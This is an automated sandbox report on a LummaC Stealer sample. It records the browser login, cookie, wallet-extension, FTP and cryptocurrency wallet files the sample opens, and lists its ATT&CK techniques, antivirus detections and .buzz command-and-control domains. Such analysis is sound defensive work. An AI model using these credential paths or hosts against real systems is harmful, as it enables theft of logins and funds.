                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
                Source: Yara matchFile source: 00000000.00000003.1400622014.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1401111547.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: cFLK1CiiNK.exe PID: 3592, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: cFLK1CiiNK.exe PID: 3592, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory851
                Security Software Discovery                		Remote Desktop Protocol41
                Data from Local System                		2
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials223
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                cFLK1CiiNK.exe58%ReversingLabsWin32.Trojan.Generic
                cFLK1CiiNK.exe54%VirustotalBrowse
                cFLK1CiiNK.exe100%AviraTR/Crypt.XPACK.Gen
                cFLK1CiiNK.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://mindhandru.buzz/ts100%Avira URL Cloudmalware
                https://mindhandru.buzz/;100%Avira URL Cloudmalware
                https://mindhandru.buzz/k100%Avira URL Cloudmalware
                https://mindhandru.buzz:443/apiz100%Avira URL Cloudmalware
                https://mindhandru.buzz/mm100%Avira URL Cloudmalware
                https://mindhandru.buzz/apib100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                mindhandru.buzz
                		172.67.165.185
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  scentniej.buzzfalse
                    		high
                    rebuildeso.buzzfalse
                      		high
                      appliacnesot.buzzfalse
                        		high
                        screwamusresz.buzzfalse
                          		high
                          cashfuzysao.buzzfalse
                            		high
                            inherineau.buzzfalse
                              		high
                              prisonyfork.buzzfalse
                                		high
                                hummskitnj.buzzfalse
                                  		high
                                  mindhandru.buzzfalse
                                    		high
                                    https://mindhandru.buzz/apifalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabcFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://mindhandru.buzz/;cFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://duckduckgo.com/ac/?q=cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://mindhandru.buzz/mmcFLK1CiiNK.exe, 00000000.00000003.1324752204.00000000016A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://mindhandru.buzz/apibcFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000002.1482281782.00000000016E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
